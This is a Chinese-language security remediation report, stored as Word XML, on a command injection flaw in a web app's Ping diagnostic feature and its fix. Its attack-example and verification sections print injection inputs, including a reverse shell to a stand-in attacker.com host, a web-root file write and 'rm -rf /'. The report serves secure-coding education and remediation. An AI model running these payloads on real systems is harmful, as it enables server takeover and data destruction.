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80" w:line="400" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>命令注入漏洞修复报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="400" w:lineRule="exact"/>
        <w:ind/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="888888"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Command Injection Remediation Report</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="400" w:lineRule="exact"/>
        <w:ind/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>项目名称：用户信息管理平台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="400" w:lineRule="exact"/>
        <w:ind/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>报告日期：2026年7月16日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="400" w:lineRule="exact"/>
        <w:ind/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>文档密级：内部公开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编制人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安全工程师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审核人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—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版本号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v2.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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文档编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4317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22"/>
              </w:rPr>
              <w:t>SEC-RPT-2026-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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1  版本迭代记录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版本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日期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主要变更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v1.0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2026-07-06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初始版本，含 16 项安全漏洞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2026-07-07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修复全量漏洞，增加密码哈希、CSRF、限速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v2.1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2026-07-08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新增注册/搜索，修复 SQL 注入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v2.2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2026-07-09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新增上传功能，修复路径遍历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v2.3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2026-07-10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新增个人中心/充值，修复权限提升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v2.4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2026-07-13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新增动态页面加载，修复文件包含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v2.5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2026-07-14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新增修改密码，修复 CSRF 与越权改密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v2.6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2026-07-15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 URL 抓取，修复 SSRF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v2.7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2026-07-16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新增 Ping 诊断，本次修复命令注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/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2  概述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新增的 Ping 网络诊断功能存在严重的命令注入漏洞。用户输入的 IP 参数通过 f-string 直接拼接到系统命令中，并以 shell=True 方式执行。攻击者可以在 IP 地址后附加任意系统命令实现远程代码执行（RCE），完全控制服务器。</w:t>
      </w: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3  漏洞概要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编号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漏洞位置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漏洞类型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风险等级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SEC-008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/ping（网络诊断）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命令注入（Command Injection）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严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/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4  漏洞详情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4.1  功能背景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/ping 路由为用户提供了一个网络诊断工具，输入 IP 地址后服务端执行 ping 命令并返回结果。这是一个常见的管理功能，但如果实现不当，会引入致命的安全风险。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4.2  问题描述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问题代码同时犯了两个安全大忌：使用 f-string 拼接命令字符串、使用 shell=True 执行。这两个错误叠加导致任意命令注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="400" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>问题代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="280" w:lineRule="exact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漏洞代码：f-string 拼接 + shell=True</w:t>
        <w:br/>
        <w:t>ip = request.form.get("ip", "")</w:t>
        <w:br/>
        <w:t>cmd = f"ping -c 3 {ip}"</w:t>
        <w:br/>
        <w:t>subprocess.check_output(cmd, shell=True)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4.3  攻击示例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攻击者在输入框中输入以下内容即可执行任意命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="280" w:lineRule="exact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注入1: 执行 id 命令</w:t>
        <w:br/>
        <w:t>输入: 127.0.0.1;id</w:t>
        <w:br/>
        <w:t>实际执行: ping -c 3 127.0.0.1;id</w:t>
        <w:br/>
        <w:br/>
        <w:t># 注入2: 反弹 Shell</w:t>
        <w:br/>
        <w:t>输入: 127.0.0.1|bash -i &gt;&amp; /dev/tcp/attacker.com/4444 0&gt;&amp;1</w:t>
        <w:br/>
        <w:t>-&gt; 攻击者获得服务器的完整控制权</w:t>
        <w:br/>
        <w:br/>
        <w:t># 注入3: 写文件</w:t>
        <w:br/>
        <w:t>输入: 127.0.0.1&amp;&amp;echo "hacked" &gt; /var/www/html/hack.html</w:t>
        <w:br/>
        <w:t>-&gt; 在服务器上写入恶意文件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4.4  攻击危害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任意系统命令执行：攻击者可执行 id、whoami、ls 等命令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获取反弹 Shell：建立远程控制通道，完全接管服务器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植入后门：写入 WebShell、修改系统文件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横向移动：以内网为跳板攻击其他服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w: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5  修复方法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漏洞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风险等级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修复措施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f-string 命令拼接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严重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改用参数列表 + shell=False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shell=True 执行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严重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改为 shell=False 禁止解析特殊字符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无输入校验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高危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正则白名单：仅允许 IP 或域名格式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无审计日志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低危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记录所有 Ping 操作和被拦截的注入尝试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pP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5.1  修复思路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命令注入的修复需要从两个层面入手：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第一层：不使用 shell 执行 — shell=False 时，参数列表中的值不会被当作命令解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="360" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>第二层：输入白名单校验 — 只允许合法的 IP 地址或域名格式，; | &amp;&amp; 等字符在入口处被拦截</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="400" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最简单的对比：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="280" w:lineRule="exact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危险：shell=True + 字符串拼接</w:t>
        <w:br/>
        <w:t>cmd = f"ping -c 3 {ip}"   # ip = "8.8.8.8;id"</w:t>
        <w:br/>
        <w:t>subprocess.check_output(cmd, shell=True)</w:t>
        <w:br/>
        <w:t># 实际执行: ping -c 3 8.8.8.8;id   ← id 被执行</w:t>
        <w:br/>
        <w:br/>
        <w:t># 安全：shell=False + 参数列表</w:t>
        <w:br/>
        <w:t>subprocess.run(["ping", "-c", "3", ip])</w:t>
        <w:br/>
        <w:t># 即使 ip="8.8.8.8;id"，也只是 ping 的参数字符串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5.2  修复后代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="280" w:lineRule="exact"/>
        <w:ind w:left="567"/>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 输入校验：仅允许 IP 或域名格式</w:t>
        <w:br/>
        <w:t>ip_pattern = r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$"</w:t>
        <w:br/>
        <w:t>if not re.match(ip_pattern, ip):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "不支持的输入格式"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 安全执行：shell=False + 参数列表</w:t>
        <w:br/>
        <w:t>result = subprocess.run(</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ["ping", "-c", "3", ip],</w:t>
        <w:br/>
        <w:t xml:space="preserve">    capture_output=True,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    timeout=30</w:t>
        <w:br/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="160" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.3  修复前后对比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对比项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修复前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修复后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执行方式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shell=True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shell=False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命令构造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f"ping -c 3 {ip}"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["ping", "-c", "3", ip]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输入校验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无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正则白名单 IP/域名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注入 ;id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执行成功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被拦截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注入 |whoami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返回 root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被拦截</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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审计日志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无</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="287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记录操作和拦截事件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6  修复验证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测试项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攻击方式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修复前结果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/>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>修复后结果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正常 Ping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127.0.0.1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返回结果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返回结果 ✅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命令注入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127.0.0.1;id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执行 id 命令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被拦截 ✅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管道注入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127.0.0.1|whoami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返回 root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被拦截 ✅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逻辑注入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127.0.0.1&amp;&amp;rm -rf /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破坏性执行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被拦截 ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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外部域名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8.8.8.8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正常返回</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2158"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b w:val="0"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>正常返回 ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>7  总结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本次修复的命令注入漏洞是本期项目中风险最高的漏洞。ping 功能本身没有问题，但用 f-string 拼接命令 + shell=True 执行，相当于把服务器的命令行直接交给了用户。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修复方法极为简单：把字符串命令改成参数列表，把 shell=True 改成 shell=False。这两行改动彻底消除了命令注入风险。无论用户在 ip 参数中输入什么特殊字符，都只会被当作 ping 的参数字符串，不会被 Shell 解释执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>这就是安全开发中最经典的一条教训：永远不要用字符串拼接的方式构造系统命令，永远不要使用 shell=True。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="400" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>— 报告结束 —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00" w:lineRule="exact" w:after="80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体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